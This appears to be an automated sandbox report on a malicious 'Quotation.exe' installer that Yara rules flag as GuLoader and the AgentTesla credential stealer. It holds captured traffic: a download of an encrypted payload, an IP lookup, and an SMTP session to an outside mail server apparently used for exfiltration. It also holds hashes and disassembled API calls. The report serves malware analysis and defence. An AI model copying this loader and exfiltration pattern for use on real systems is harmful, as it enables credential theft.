2024-11-05 14:07:58 UTC	4927	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="rdUaNvnbGprIsBLOHb175.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 240192 Last-Modified: Tue, 05 Nov 2024 11:56:59 GMT X-GUploader-UploadID: AHmUCY1C0zBojGGQc3-pPsX_RmlCkCkJnDrtHsjmTg5asF7x_acvhLTlBnr_obVjAq-z8k6-vlXkIM8pnA Date: Tue, 05 Nov 2024 14:07:57 GMT Expires: Tue, 05 Nov 2024 14:07:57 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=dK1fKg== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-05 14:07:58 UTC	4927	IN	Data Raw: 34 d6 a6 65 bf ad 83 c0 ad ce 8f 9e 33 63 3b b0 93 70 84 ae 10 11 ee 61 21 d6 e9 ea c1 4d 6c c9 73 5e 15 6b 37 a7 aa 1d f5 eb 4d cc 54 14 02 70 53 68 63 c5 43 e1 bf d6 5b fb 76 95 92 34 0a 7f 2c 4a b3 b1 3c 29 0f eb d7 48 dc 09 d0 72 cd 4d 25 90 44 6e 24 48 13 41 34 62 37 a7 25 5d f8 6d 81 94 7c 30 45 8c 54 25 db 1f d6 e7 a8 5e 98 8a ca dd b6 d1 12 9d 21 c2 3b 4e bc 37 f3 8f de 49 8b b9 55 8c 24 f0 56 48 cb a4 f8 cf 6d 76 1a ef 66 9b ff 90 e8 b7 f0 db 39 01 e1 7e b5 51 66 67 e6 a1 29 08 e6 26 05 dd 2b 59 ab 7b 85 2f 59 27 04 be 6e bc e2 3a 7a 4c 42 d0 11 88 10 40 ae 94 e4 d8 08 eb f3 9e e6 2a 0d 77 71 c0 3f 15 ea cf 60 f7 71 41 87 a1 76 20 bc c4 97 47 e3 09 23 72 d7 23 38 04 2a 9f 56 e4 29 ee a2 70 a2 aa e9 ec 5e df 58 e7 4c 6f 4e ad ec 0a 11 55 87 1f 52 Data Ascii: 4e3c;pa!Mls^k7MTpShcC[v4,J<)HrM%Dn$HA4b7%]m\|0ET%^!;N7IU$VHmvf9~Qfg)&+Y{/Y'n:zLB@wq?`qAv G#r#8V)p^XLoNUR
2024-11-05 14:07:58 UTC	4843	IN	Data Raw: ae 8b eb 14 93 42 33 75 81 08 86 e9 bd d0 bd fd b3 36 5e e1 9a 56 1b 63 60 d9 19 82 be ca 46 74 fb e9 29 ef 30 da 6f e8 f4 a2 68 f1 90 cd 23 31 1a ab 4e 21 7f 40 90 69 98 db 05 06 95 16 7b 1e aa 4f 69 5a 13 19 df e4 66 3a 1a 15 16 2a df f2 e3 05 d9 9a c7 65 91 ac a5 56 88 7b ec 1a ec 35 01 cd 2a 09 43 73 1b d5 f5 bc 94 f2 eb 53 31 c3 2f 34 a1 58 81 66 71 e4 e2 f4 83 ac 1e 70 e9 2b 81 59 e3 25 58 5b 0d 6d db c0 d6 8a 17 90 08 68 52 c2 2b 3b 82 99 c9 1b c8 9e 56 a5 c4 57 91 69 f3 a0 72 91 9c 92 7c e2 32 04 94 37 a8 3b b5 a4 c5 f3 a3 01 a0 02 65 2a ad 7c a8 88 11 2b b8 2d f0 47 1c c5 d2 31 32 ff eb 10 55 fd b4 83 00 3c d8 95 88 16 db f6 eb 35 1e 9b 07 d2 a0 ec 42 b8 54 39 6c bb 3d b5 6a 5d 5d 38 6d 14 5a 12 16 df cb 36 df 22 75 af 2f 77 bb 99 1b d5 a4 8b 8d Data Ascii: B3u6^Vc`Ft)0oh#1N!@i{OiZf:eV{5CsS1/4Xfqp+Y%X[mhR+;VWir\|27;e*\|+-G12U<5BT9l=j]]8mZ6"u/w
2024-11-05 14:07:58 UTC	1324	IN	Data Raw: 2f 2a d5 0f a1 69 af 3c a3 2e 5d 9d 95 7e ec dd 80 7c 45 20 90 91 2a 25 6e 75 05 f3 01 bf ec b5 85 d3 72 8f 36 1c f9 59 a3 d6 2f 37 48 e5 5a 1c 02 82 02 55 6b 81 71 05 7e 18 d8 22 c8 4d 3d 51 1e 01 ba e0 5c 55 2d 4d 3d 3e 2c cd a8 3c 74 25 3a e0 29 da c7 ce 80 7b 78 77 eb 67 a9 4d aa 52 a9 8c 16 b3 15 67 71 7d ef b9 4c 86 fc d1 3f d2 ff da 0d 83 c2 b6 e7 e8 53 92 5b a6 24 ae 7f 25 2c c4 cf ad 47 08 98 19 a8 89 17 c0 21 d3 4f 5e a4 3a fd 11 80 64 6b db 7e 82 42 bb dc 66 c9 eb 2a 0f 45 c8 ee 4c 8c 7a 97 fe 74 e1 c8 ca ae e3 83 f8 14 ff 3b 07 86 97 ff 76 af 20 02 6c 24 58 62 68 9b 04 86 af d2 e6 fd 57 79 43 05 eb f1 9e d7 5f 1b 34 4d 98 2c 5d de c2 9a ff a1 a0 5e 43 78 2c 3a f6 b0 16 3f 0a 4e ad b9 f8 a1 fd 63 7c 20 fa 21 03 af c2 50 70 26 1d 64 dd 02 99 b3 Data Ascii: /i<.]~\|E %nur6Y/7HZUkq~"M=Q\U-M=>,<t%:){xwgMRgq}L?S[$%,G!O^:dk~Bf*ELzt;v l$XbhWyC_4M,]^Cx,:?Nc\| !Pp&d
2024-11-05 14:07:58 UTC	1378	IN	Data Raw: 26 4c 85 10 4d bc 1d f6 6c a9 ae 36 a0 d1 18 5b 76 63 40 c8 ba 13 c4 da 91 2b 87 48 da 85 95 89 8c be 77 48 a2 fe 5e 70 95 af f1 5c 2b f1 87 82 68 81 01 53 94 f2 e8 a6 60 64 76 f2 8f a3 64 e8 21 11 7e 65 c1 88 2c 25 c3 df 62 74 61 94 53 9b 85 a5 1a 4c 3f cd 92 4c 9f 27 e0 44 ac 59 6e fa 5d 40 41 4d 88 5b 4f 4b 10 4f 37 b0 35 60 79 ba 17 51 e4 fa ec bc 8c 5b 04 17 b8 c5 66 0f 40 2f 28 da 0f b9 75 ae 3c a3 d0 a2 a8 98 7e cc d8 b8 bf 47 de 91 88 26 25 6e 75 05 f1 0d bf 12 47 88 df 32 b5 24 1c f9 79 5b d7 16 2c b6 eb 59 e2 0e 78 0e 7e 55 a1 73 0f f2 5c 26 23 f0 a2 33 51 1e df a5 e0 5c ab dd 42 31 1e 2f 33 a4 30 8a 0b 3d e0 29 24 35 cc b9 79 7c 77 eb 99 5d 4c 93 59 96 8c 16 47 3c 77 71 01 8c d3 14 aa 42 dd 3d d8 ff d8 08 83 ca b1 e7 e8 78 92 5b aa 24 8e 84 29 Data Ascii: &LMl6[vc@+HwH^p\+hS`dvd!~e,%btaSL?L'DYn]@AM[OKO75`yQ[f@/(u<~G&%nuG2$y[,Yx~Us\&#3Q\B1/30=)$5y\|w]LYG<wqB=x[$)
2024-11-05 14:07:58 UTC	1378	IN	Data Raw: f3 b3 7d 18 3f 9f 4b f5 c8 e1 b3 6e c6 37 87 56 6e 63 ac 0e 6a 17 60 a9 30 1c cf 5e 2e 40 ce b3 85 8e ed 68 08 88 26 2a e9 52 4c a6 91 14 df e4 d1 f3 8a 11 8b d6 14 5d ac 2f 5f 39 53 be 3a 6d e8 a2 77 ab 06 d4 c4 58 5a d8 42 bf 60 6d b8 1d d6 65 57 a0 35 5e df e5 57 75 9d 6c ce ba 33 cf 24 90 12 6f 49 e3 a5 6b 85 8c 40 80 44 a3 85 7a d1 6a 54 f0 71 2c f1 fc e5 96 8f 06 3c af 0c e4 a3 40 48 76 f2 8f 5d 94 ea 18 1b 80 69 c2 88 2c 24 c3 df 62 74 6e ae 59 9b 7b a9 19 6c 1e cb 92 4c 61 d7 e2 7d a9 a7 62 f9 65 65 4d 4d 88 63 47 b4 d6 b5 1d b0 35 58 6f 8a 14 51 c5 25 11 43 7b 25 48 06 98 cf 98 06 41 d1 d8 d0 0d 81 8e a6 3f a3 f8 6f a4 9b 78 c6 dd a3 8f 42 20 80 b0 30 25 65 75 fb ec 2d bf ec 4b 89 21 7c ac 24 24 8a 59 5d d7 16 d2 44 e6 5a c2 0c 86 02 7d ab 80 48 Data Ascii: }?Kn7Vncj`0^.@h&*RL]/_9S:mwXZB`meW5^Wul3$oIk@DzjTq,<@Hv]i,$btnY{lLa}beeMMcG5XoQ%C{%HA?oxB 0%eu-K!\|$$Y]DZ}H
2024-11-05 14:07:58 UTC	1378	IN	Data Raw: 9b 23 2c ac ee 42 34 06 00 66 cb 40 85 6b 7d 58 c6 61 16 a4 e2 1f df cb a7 cb 22 75 85 56 45 ba 99 e1 2a 91 8c 8d 1c e2 a4 97 14 fc 55 3a fe b0 54 87 02 d6 77 98 44 01 cf 8f 66 2b a7 d1 c8 f0 0a bc ed dc b8 06 9b 9c 02 e6 b3 45 99 c1 96 4a f5 16 ed b1 6e e6 09 29 56 6e 9d 8d 35 76 17 60 57 c0 16 cf 5e ab 38 cd b3 a1 a2 b1 68 08 7c 1d be e7 52 4c 86 ab 9b df e4 2f dd 8d 11 8b 28 e6 51 af 0f 5d c7 5f bd c4 4c d9 b0 77 ab f8 f5 fd 56 5a d8 bc 89 10 6d 98 1e f6 6c 57 5e 3b a2 d1 e6 a9 79 61 60 ed ba 13 c4 24 6e 13 a8 42 da 85 6b 85 ac bf 89 44 a3 00 10 d3 6a 50 f0 70 2f f1 a7 81 96 8f 02 ad 95 35 e1 a5 60 44 4e f7 8f a3 9a d1 62 e4 81 9a 3f 81 0c 24 b8 aa 62 8a 6b b2 ad 95 7a a9 e7 41 1f cb ba 11 9f d9 eb 83 a0 59 6e 81 11 45 41 49 a0 65 b9 b5 e9 4e 14 b0 35 Data Ascii: #,B4f@k}Xa"uVE*U:TwDf+EJn)Vn5v`W^8h\|RL/(Q]_LwVZmlW^;ya`$nBkDjPp/5`DNb?$bkzAYnEAIeN5
2024-11-05 14:07:58 UTC	1378	IN	Data Raw: 21 c4 29 c5 85 5e e5 19 c8 60 a4 ae c4 25 b3 12 87 d0 0f a4 ef 10 7c 1c 4e 2e 8f 1f a0 31 c8 d6 b7 e8 a7 21 91 2a 70 2a 53 78 56 86 12 d5 4a 20 f3 67 6c da d2 31 bc d6 c4 02 55 f7 c6 3a 09 3c a8 95 d2 16 db fa b6 19 1f 9b 03 d2 a2 ee 42 ca f9 35 6c cb 60 8c 6b 5d 59 38 60 2f 79 ec 1f df 35 50 c7 22 5d e0 52 45 bc 67 16 2a a8 a9 fe 1c e2 9c 6c 15 a3 6c 0f ae 4f ab 58 22 d6 77 98 a1 3f cd 8f 86 d5 ab d1 c4 d0 1d ad cd dc 46 07 a2 68 0c e4 b3 57 38 d9 96 4a f5 16 ef b3 6e c6 f6 25 56 6e 43 c6 0c 6a 17 9e 56 07 15 cf 5e d0 66 ed f8 a5 8a ed 96 06 76 27 13 19 5e 4c a6 89 fa df e4 d1 2d 8e 28 a9 d6 ea 53 51 26 5f c7 7a c6 4e 4d e0 a6 05 27 fc d5 8d 7e 41 d8 42 8d 6d 19 b8 1d f2 4c 35 a0 35 a0 2f e8 57 75 63 9e c1 ba 13 e4 16 90 12 91 b6 db bc 61 85 8c be a3 64 Data Ascii: !)^`%\|N.1!pSxVJ gl1U:<B5l`k]Y8`/y5P"]REg*llOX"w?FhW8Jn%VnCjV^fv'^L-(SQ&_zNM'~ABmL55/Wucad
2024-11-05 14:07:58 UTC	1378	IN	Data Raw: c0 5f 1a 1e 15 e8 24 21 f3 da dd d5 9a c7 37 83 ac a5 26 5e 70 d5 38 ea 1d 09 33 23 0f bd 5a 60 a1 d5 bd 90 80 39 7f 36 b1 07 29 81 5d 8b 1b 05 1a ec f4 a3 b8 e0 7c ed d5 af 5b e3 25 a6 a9 0c 54 7a fc d6 8a e9 62 08 51 36 c4 29 3b 7a 6e c6 19 e8 10 5a a7 c4 65 fd 94 0c 2f 2f 9d 9d 92 78 e2 30 06 94 1f 5e 37 b5 a2 97 e0 a3 01 d0 d4 71 13 a7 76 56 86 38 0b 4f 20 f3 47 90 d4 d2 31 42 29 f1 10 55 d7 ff c4 00 3c 56 bc a6 01 db fc 96 e4 16 9a 03 0c a1 ee 42 ca 47 96 93 34 bf a5 51 5d 59 c6 9f 18 5a ec 1f 21 c7 59 c7 02 50 a5 52 45 44 98 26 09 a8 89 8d e2 eb 9c 92 31 87 21 02 ac 4b d9 a6 2c d6 07 b0 44 31 cd 85 fb 5f a7 d1 c0 d0 2c ad cd dc 46 08 9b 62 0c 1a bf 7d 18 e1 bd 4a f5 e8 1f b2 57 e4 08 29 56 90 6a 8c 0c 4f 6c 14 57 3e 1b bd b4 d4 4c bd 9b be 8a ed 62 Data Ascii: _$!7&^p83#Z`96)]\|[%TzbQ6);znZe//x0^7qvV8O G1B)U<VBG4Q]YZ!YPRED&1!K,D1_,Fb}JW)VjOlW>Lb
2024-11-05 14:07:58 UTC	1378	IN	Data Raw: ed 32 78 9c ef 14 b9 3c 47 75 81 f2 a7 e8 ac d0 bd 03 43 3a 5f e1 9a 54 1b 63 60 d6 19 82 be ca 49 49 f1 e9 d7 e3 1e fa 43 e9 f4 a2 96 01 91 f4 31 cf 16 ab 3d 15 2d 40 9a 97 68 db 3c 04 97 16 7b e0 5d 41 6d 7f 68 93 d3 e0 62 68 94 10 16 5a 09 e8 da 23 d3 e7 b3 17 90 a8 85 75 a0 71 ec e4 e4 1d 09 cd d4 03 bd 7f 3b df d5 bd 94 0c ea 42 14 c1 2f 32 7f 54 81 66 54 61 98 f0 83 a8 92 e8 e8 2b d1 73 f8 25 58 af 71 20 5a c0 d2 aa e2 9c 09 68 df ca 29 3b 84 99 cb 19 c8 40 57 a7 c4 25 68 68 ca f2 0f a0 9d 6c 71 1c 3e 23 ef 6b a0 3b b1 d0 11 ed a3 71 f8 31 70 2a a7 0b 22 86 12 2f 66 2e f3 47 6e 24 dc 31 42 d7 03 1c 55 f7 e6 c7 00 3c a8 43 9e 2f cc fc 96 1a e1 92 02 2c 8c e6 42 ca 07 79 a0 3c bf 7a 4b 59 59 c6 61 e8 54 ec 1f df 35 55 c7 22 55 ed 52 45 ba 67 1e 12 bf Data Ascii: 2x<GuC:_Tc`IIC1=-@h<{]AmhbhZ#uq;B/2TfTa+s%Xq Zh);@W%hhlq>#k;q1p*"/f.Gn$1BU<C/,By<zKYYaT5U"UREg
2024-11-05 14:07:58 UTC	1378	IN	Data Raw: c7 c8 f1 02 3c da 58 7b a7 07 99 9e 68 bc 3a 25 74 ca f0 42 f1 01 d6 dd c5 41 90 91 4f f1 a9 bf 04 f5 a8 cc 9d 97 55 dc 7d 35 47 1f 51 39 aa 68 06 01 89 eb 7d d6 73 49 fa bb d0 3f 98 44 d5 d4 48 1c 54 b1 7e 22 87 5e 78 fa 42 50 87 11 1d b2 41 13 02 81 f6 87 90 72 21 42 02 6d 68 5f e1 64 a6 15 63 40 dd e7 8e be 34 68 44 fb e9 d7 1d 35 e3 6d e9 f4 a2 96 06 91 f4 14 4a 6e ab 3d 31 0d 72 9c 97 e6 f2 1e 26 97 1c 06 6a 54 41 69 7a 26 e7 d3 e0 98 14 1e 15 16 d4 2d f3 da 03 80 9a c7 17 6e ad 9c 2c a0 71 ec 30 ca 47 09 cd 2a f1 b3 7f 1b d5 2b b1 94 f2 cb 58 36 c1 2f cc 80 64 8b 66 71 1a c6 d0 a7 ac e0 7c 13 25 a1 5b e3 db 54 a5 0c 74 42 c0 d6 8a 17 9d 30 7f 21 c4 29 c5 8d 66 c7 39 ee 60 5a a7 84 12 61 96 0c f0 16 a0 9d 92 86 12 3e 06 94 e1 ac 3b b5 82 c6 e8 a3 01 Data Ascii: <X{h:%tBAOU}5GQ9h}sI?DHT~"^xBPAr!Bmh_dc@4hD5mJn=1r&jTAiz&-n,q0G*+X6/dfq\|%[TtB0!)f9`Za>;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49977	172.67.74.152	443	1516	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 14:08:00 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-05 14:08:01 UTC	399	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 14:08:01 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8ddd69d6385aea8c-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1104&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=2454237&cwnd=228&unsent_bytes=0&cid=ee100958b2a2e21d&ts=192&x=0"
2024-11-05 14:08:01 UTC	14	IN	Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 Data Ascii: 173.254.250.76

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 5, 2024 15:08:03.887131929 CET	587	49993	67.23.226.139	192.168.2.7	220-super.nseasy.com ESMTP Exim 4.96.2 #2 Tue, 05 Nov 2024 09:08:03 -0500 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 5, 2024 15:08:03.887388945 CET	49993	587	192.168.2.7	67.23.226.139	EHLO 124406
Nov 5, 2024 15:08:04.036858082 CET	587	49993	67.23.226.139	192.168.2.7	250-super.nseasy.com Hello 124406 [173.254.250.76] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 5, 2024 15:08:04.037050962 CET	49993	587	192.168.2.7	67.23.226.139	STARTTLS
Nov 5, 2024 15:08:04.190404892 CET	587	49993	67.23.226.139	192.168.2.7	220 TLS go ahead

Target ID:	0
Start time:	09:07:03
Start date:	05/11/2024
Path:	C:\Users\user\Desktop\Quotation.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Quotation.exe"
Imagebase:	0x400000
File size:	1'182'800 bytes
MD5 hash:	816B7984251EE4C846A7F0D6160624E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1666164955.00000000059B8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:51:26
Start date:	05/11/2024
Path:	C:\Users\user\Desktop\Quotation.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Quotation.exe"
Imagebase:	0x400000
File size:	1'182'800 bytes
MD5 hash:	816B7984251EE4C846A7F0D6160624E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2518927845.00000000350DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2518927845.00000000350B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2518927845.00000000350B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	30.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	18.4%
Total number of Nodes:	824
Total number of Limit Nodes:	18

Executed Functions

Function 004036DA Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 416
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008001), ref: 004036F6
GetVersionExW.KERNEL32(?), ref: 0040371F
GetVersionExW.KERNEL32(?), ref: 00403732
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037DA
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403814
OleInitialize.OLE32(00000000), ref: 0040381B
SHGetFileInfoW.SHELL32(004085B0,00000000,?,?,00000000), ref: 0040383A
GetCommandLineW.KERNEL32(007A7540,NSIS Error), ref: 0040384F
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Quotation.exe",?,"C:\Users\user\Desktop\Quotation.exe",00000000), ref: 0040389B
GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\), ref: 00403999
GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 004039AA
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004039B6
GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004039CA
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 004039D2
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 004039E3
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 004039EB
DeleteFileW.KERNELBASE(1033), ref: 00403A05

Part of subcall function 004033CB: GetTickCount.KERNEL32 ref: 004033DE
Part of subcall function 004033CB: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation.exe,00000400), ref: 004033FA

lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Quotation.exe",00000000,00000000), ref: 00403AA8
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00408600,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Quotation.exe",00000000,00000000), ref: 00403ABB
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Quotation.exe",00000000,00000000), ref: 00403ACA
lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Quotation.exe",00000000,00000000), ref: 00403AD9
SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 00403B01
DeleteFileW.KERNEL32(0079F200,0079F200,?,007A9000,?), ref: 00403B54
CopyFileW.KERNEL32(C:\Users\user\Desktop\Quotation.exe,0079F200,00000001), ref: 00403B66
CloseHandle.KERNEL32(00000000,0079F200,0079F200,?,0079F200,00000000), ref: 00403B9F

Part of subcall function 00405DFC: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user~1\AppData\Local\Temp\,00403CA7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00405E04
Part of subcall function 00405DFC: GetLastError.KERNEL32 ref: 00405E0E

OleUninitialize.OLE32(00000000), ref: 00403BCD
ExitProcess.KERNEL32 ref: 00403BE4
GetCurrentProcess.KERNEL32(?,?), ref: 00403BFA
OpenProcessToken.ADVAPI32(00000000), ref: 00403C01
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C16
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403C39
ExitWindowsEx.USER32(00000002,80040002), ref: 00403C5E

Part of subcall function 004065D4: CharNextW.USER32(?,0040389A,"C:\Users\user\Desktop\Quotation.exe",?,"C:\Users\user\Desktop\Quotation.exe",00000000), ref: 004065EA

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040398E, 00403993, 004039A9, 004039B5, 004039C4, 004039D1, 004039DD, 004039E5, 00403AA1, 00403AB6, 00403AC5, 00403AD4, 00403AE7, 00403AFC, 00403BB4
NSIS Error, xrefs: 00403840
Error launching installer, xrefs: 00403A4D
C:\Users\user\Desktop\Quotation.exe, xrefs: 00403B61
1033, xrefs: 00403A00
SeShutdownPrivilege, xrefs: 00403C10
C:\Users\user\overlays\besvangredes, xrefs: 0040397E, 00403A6D, 00403B07, 00403B15
TMP, xrefs: 004039E6
C:\Users\user\Desktop, xrefs: 00403ACF, 00403B10
.tmp, xrefs: 00403AC0
Low, xrefs: 004039CC
\Temp, xrefs: 004039B0
C:\Users\user\overlays\besvangredes, xrefs: 00403A78
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004036E6
TEMP, xrefs: 004039DE
~nsu, xrefs: 00403A9C
UXTHEME, xrefs: 004037CE, 004037D3, 004037D9
"C:\Users\user\Desktop\Quotation.exe", xrefs: 00403856, 0040388C, 00403894, 00403A22, 00403A2E

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\Quotation.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Quotation.exe$C:\Users\user\overlays\besvangredes$C:\Users\user\overlays\besvangredes$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 1152188737-1575449900
Opcode ID: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
Instruction ID: ef6c2823884109cd5a884fcd16d1840cc0f2fcd0ed87f9f7bcd5e2f232321f3d
Opcode Fuzzy Hash: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
Instruction Fuzzy Hash: B8D14DB16043106AD7207FB19D45B6B3EECAB4574AF05443FF585B62D2DBBC8A40872E

Function 73C62351 Relevance: 18.7, APIs: 12, Instructions: 705stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 73C612F8: GlobalAlloc.KERNEL32(?,?,73C611C4,-000000A0), ref: 73C61302

GlobalAlloc.KERNELBASE(?,00001CA4), ref: 73C6294E
lstrcpyW.KERNEL32(00000008,?), ref: 73C629A4
lstrcpyW.KERNEL32(00000808,?), ref: 73C629AF
GlobalFree.KERNEL32(00000000), ref: 73C629C0
GlobalFree.KERNEL32(?), ref: 73C62A44
